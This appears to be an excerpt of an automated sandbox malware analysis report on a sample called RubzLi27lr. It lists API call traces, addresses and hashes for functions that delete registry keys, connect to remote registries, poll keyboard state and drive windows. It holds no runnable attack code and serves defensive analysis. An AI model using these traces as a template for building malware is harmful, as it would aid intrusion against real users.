                                                                                                                    • Part of subcall function 00B3CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00B3CCBD
                                                                                                                    • Part of subcall function 00B3CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B3CCCF
                                                                                                                    • Part of subcall function 00B3CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B3CD05
                                                                                                                    • Part of subcall function 00B3CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B3CD28
                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B3CCF3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                  • API String ID: 2734957052-4033151799
                                                                                                                  • Opcode ID: 75ffca4eafc4d65b74c06c9072d9f6179fdb0ec47757876b418d3eb90e4abd63
                                                                                                                  • Instruction ID: 3a5f0dfa1b738eae2613bd3571e200f1c1b4ae4c7793ab71cec4720fee974959
                                                                                                                  • Opcode Fuzzy Hash: 75ffca4eafc4d65b74c06c9072d9f6179fdb0ec47757876b418d3eb90e4abd63
                                                                                                                  • Instruction Fuzzy Hash: 4C313C75942129BBD7208B95DC88EFFBFBCEF46750F1001A5B905E3250DE349A459BA0
                                                                                                                  APIs
                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B23D40
                                                                                                                  • _wcslen.LIBCMT ref: 00B23D6D
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B23D9D
                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B23DBE
                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00B23DCE
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B23E55
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B23E60
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B23E6B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                  • API String ID: 1149970189-3457252023
                                                                                                                  • Opcode ID: 30f93bfba3ab58e78c418dcaa39c10338a5f024fdbf1433ea0bef106cc54d177
                                                                                                                  • Instruction ID: 5925dcef3791938f2aa5570ea19bc699f0eae347ab1eecc2954015efab8c87b7
                                                                                                                  • Opcode Fuzzy Hash: 30f93bfba3ab58e78c418dcaa39c10338a5f024fdbf1433ea0bef106cc54d177
                                                                                                                  • Instruction Fuzzy Hash: 8231AF76A00219ABDB209FA0DC49FEB37FCEF89B40F1041B6F609D6160EB7497448B24
                                                                                                                  APIs
                                                                                                                  • timeGetTime.WINMM ref: 00B1E6B4
                                                                                                                    • Part of subcall function 00ACE551: timeGetTime.WINMM(?,?,00B1E6D4), ref: 00ACE555
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00B1E6E1
                                                                                                                  • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00B1E705
                                                                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B1E727
                                                                                                                  • SetActiveWindow.USER32 ref: 00B1E746
                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B1E754
                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B1E773
                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00B1E77E
                                                                                                                  • IsWindow.USER32 ref: 00B1E78A
                                                                                                                  • EndDialog.USER32(00000000), ref: 00B1E79B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                  • String ID: BUTTON
                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                  • Opcode ID: 3762bd19c0a7f1b2006be8a61fda59be6ae6584886407cbe63988392f599a518
                                                                                                                  • Instruction ID: fc3719d30c7074379b6abb75edf6439e3a57d41f72130f7e3f27e6741a760ef5
                                                                                                                  • Opcode Fuzzy Hash: 3762bd19c0a7f1b2006be8a61fda59be6ae6584886407cbe63988392f599a518
                                                                                                                  • Instruction Fuzzy Hash: 53216DB4201204AFFB005F20EC89A6A3FE9FB56B48B944465F925831B1EF71ED80CB24
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B1EA5D
                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B1EA73
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B1EA84
                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B1EA96
                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B1EAA7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString$_wcslen
                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                  • API String ID: 2420728520-1007645807
                                                                                                                  • Opcode ID: 9019b4dbcefbc3190288b23569773fe52816a4c0e9097ac270dc688d7fbeb9e2
                                                                                                                  • Instruction ID: 1b355dd71e1e507a2bd66a213c3dcfc2fd93affb391ad176be1a2fe9b2c50063
                                                                                                                  • Opcode Fuzzy Hash: 9019b4dbcefbc3190288b23569773fe52816a4c0e9097ac270dc688d7fbeb9e2
                                                                                                                  • Instruction Fuzzy Hash: EA119131A5021979D720A7A1DD4ADFF6FFCEFD5F00F404469B925A20E2EE704944C5B0
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00B1A012
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00B1A07D
                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00B1A09D
                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00B1A0B4
                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00B1A0E3
                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00B1A0F4
                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00B1A120
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00B1A12E
                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00B1A157
                                                                                                                  • GetKeyState.USER32(00000012), ref: 00B1A165
                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00B1A18E
                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00B1A19C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541375521-0
                                                                                                                  • Opcode ID: 2668cf066fa02c6757e23f10b041118feec89d84c1f3201188057f4ed74a6b97
                                                                                                                  • Instruction ID: 1033ab05f946a8b454deb5a6c8a6127868dddca88ddda02b98089c424f4f116c
                                                                                                                  • Opcode Fuzzy Hash: 2668cf066fa02c6757e23f10b041118feec89d84c1f3201188057f4ed74a6b97
                                                                                                                  • Instruction Fuzzy Hash: F051D8609057C439FB35EB608815BEAAFF4DF12380F8885D9D5C2971C2DA64BACCC762
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00B15CE2
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00B15CFB
                                                                                                                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B15D59
                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00B15D69
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00B15D7B
                                                                                                                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B15DCF
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00B15DDD
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00B15DEF
                                                                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B15E31
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00B15E44
                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B15E5A
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00B15E67
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3096461208-0
                                                                                                                  • Opcode ID: ec4ef69add533bc1b29897bbe5da3fbf8ff77c6b2dffbb665279bd516f21135d
                                                                                                                  • Instruction ID: 7722a8cafd95718d6b3c1195585d1ee7915eb14b235f54babd763bad815c4ae0
                                                                                                                  • Opcode Fuzzy Hash: ec4ef69add533bc1b29897bbe5da3fbf8ff77c6b2dffbb665279bd516f21135d
                                                                                                                  • Instruction Fuzzy Hash: CF511D75B00605AFDB18CF68DD89AAEBBF5FB89700F508169F915E7290DB709E40CB50
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AC8BE8,?,00000000,?,?,?,?,00AC8BBA,00000000,?), ref: 00AC8FC5
                                                                                                                  • DestroyWindow.USER32(?), ref: 00AC8C81
                                                                                                                  • KillTimer.USER32(00000000,?,?,?,?,00AC8BBA,00000000,?), ref: 00AC8D1B
                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00B06973
                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00AC8BBA,00000000,?), ref: 00B069A1
                                                                                                                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00AC8BBA,00000000,?), ref: 00B069B8
                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AC8BBA,00000000), ref: 00B069D4
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00B069E6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 641708696-0
                                                                                                                  • Opcode ID: 44ce756a47dadef065938ea3ace13ab495d36d3684705afd0fd3489a0217d682
                                                                                                                  • Instruction ID: 16169373da2403fcdb45d29b7764c38d1adbb569bb393fc5bd9d3274b788a468
                                                                                                                  • Opcode Fuzzy Hash: 44ce756a47dadef065938ea3ace13ab495d36d3684705afd0fd3489a0217d682
                                                                                                                  • Instruction Fuzzy Hash: 7B619935106610DFCB259F18DA48B2A7BF1FB41312F12495CE0429BAB0CF39AD92DFA4
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9944: GetWindowLongW.USER32(?,000000EB), ref: 00AC9952
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00AC9862
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ColorLongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 259745315-0
                                                                                                                  • Opcode ID: 561dec298a2c5911862672a4c4b14d335d79cf73f059383ac432ecece025363b
                                                                                                                  • Instruction ID: 8fb5b1670b10544021f25f3766276ad6d7cea9eda4af40dcb88f27faea4cdb78
                                                                                                                  • Opcode Fuzzy Hash: 561dec298a2c5911862672a4c4b14d335d79cf73f059383ac432ecece025363b
                                                                                                                  • Instruction Fuzzy Hash: BD41C135505650AFDB205F389C88FBA3BA5FB17730F154649F9A29B2E2CB309E42DB10
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00AFF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00B19717
                                                                                                                  • LoadStringW.USER32(00000000,?,00AFF7F8,00000001), ref: 00B19720
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00AFF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00B19742
                                                                                                                  • LoadStringW.USER32(00000000,?,00AFF7F8,00000001), ref: 00B19745
                                                                                                                  • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00B19866
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                  • API String ID: 747408836-2268648507
                                                                                                                  • Opcode ID: b3e9f831bfc7f58970edc96246898a80c170358368f6775b0bb3de479d478a27
                                                                                                                  • Instruction ID: 0936e4bc190db7d3500cc95f383013dc2e8d267ffe8c1ce011f6f8b899e996b2
                                                                                                                  • Opcode Fuzzy Hash: b3e9f831bfc7f58970edc96246898a80c170358368f6775b0bb3de479d478a27
                                                                                                                  • Instruction Fuzzy Hash: 9A411C72800219AACF04EBE0DE96EEFB7BCAF55740F604065F60576092EB356F48CB61
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B107A2
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B107BE
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B107DA
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B10804
                                                                                                                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B1082C
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B10837
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B1083C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                  • API String ID: 323675364-22481851
                                                                                                                  • Opcode ID: dca05e0b4fd9b761fef9927ef35c70263868f225247224d38093c295cc0f882b
                                                                                                                  • Instruction ID: 40ff1c69509df1b0b00ea661579a9788307c1b41e11f8021ef807bbc4e3d20dc
                                                                                                                  • Opcode Fuzzy Hash: dca05e0b4fd9b761fef9927ef35c70263868f225247224d38093c295cc0f882b
                                                                                                                  • Instruction Fuzzy Hash: 09413972C10229ABDF21EFA4DD95CEEB7B8FF04740F444169E915A71A1EB709E44CB90
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00B33C5C
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00B33C8A
                                                                                                                  • CoUninitialize.OLE32 ref: 00B33C94
                                                                                                                  • _wcslen.LIBCMT ref: 00B33D2D
                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00B33DB1
                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B33ED5
                                                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00B33F0E
                                                                                                                  • CoGetObject.OLE32(?,00000000,00B4FB98,?), ref: 00B33F2D
                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00B33F40
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B33FC4
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B33FD8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 429561992-0
                                                                                                                  • Opcode ID: 705105eb71c4584df3613f6c742a60d09e6ae3c6588e7adc43d3f633b22c94f3
                                                                                                                  • Instruction ID: ac77011c3f2eeed6d5403a0057e15cb189144c6ab68bbed6c1ee4442b3c17eb8
                                                                                                                  • Opcode Fuzzy Hash: 705105eb71c4584df3613f6c742a60d09e6ae3c6588e7adc43d3f633b22c94f3
                                                                                                                  • Instruction Fuzzy Hash: BAC159716083059FD700DF68C88496BBBE9FF89B44F20499DF98A9B211DB31EE45CB52
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00B27AF3
                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B27B8F
                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00B27BA3
                                                                                                                  • CoCreateInstance.OLE32(00B4FD08,00000000,00000001,00B76E6C,?), ref: 00B27BEF
                                                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B27C74
                                                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00B27CCC
                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00B27D57
                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B27D7A
                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00B27D81
                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00B27DD6
                                                                                                                  • CoUninitialize.OLE32 ref: 00B27DDC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2762341140-0
                                                                                                                  • Opcode ID: a4d42f2bf4862a13e084f651c548c9ef0649d0c633c6c3d12baad1f45ca53351
                                                                                                                  • Instruction ID: 5195935bfa8e6069ba8e2d8f245ebaa43d1edcceb88b64f375279af56d78de56
                                                                                                                  • Opcode Fuzzy Hash: a4d42f2bf4862a13e084f651c548c9ef0649d0c633c6c3d12baad1f45ca53351
                                                                                                                  • Instruction Fuzzy Hash: DAC13D75A04119AFCB14DF64D898DAEBBF9FF48304B1485A9E41ADB361DB30EE41CB90
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B45504
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B45515
                                                                                                                  • CharNextW.USER32(00000158), ref: 00B45544
                                                                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B45585
                                                                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B4559B
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B455AC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
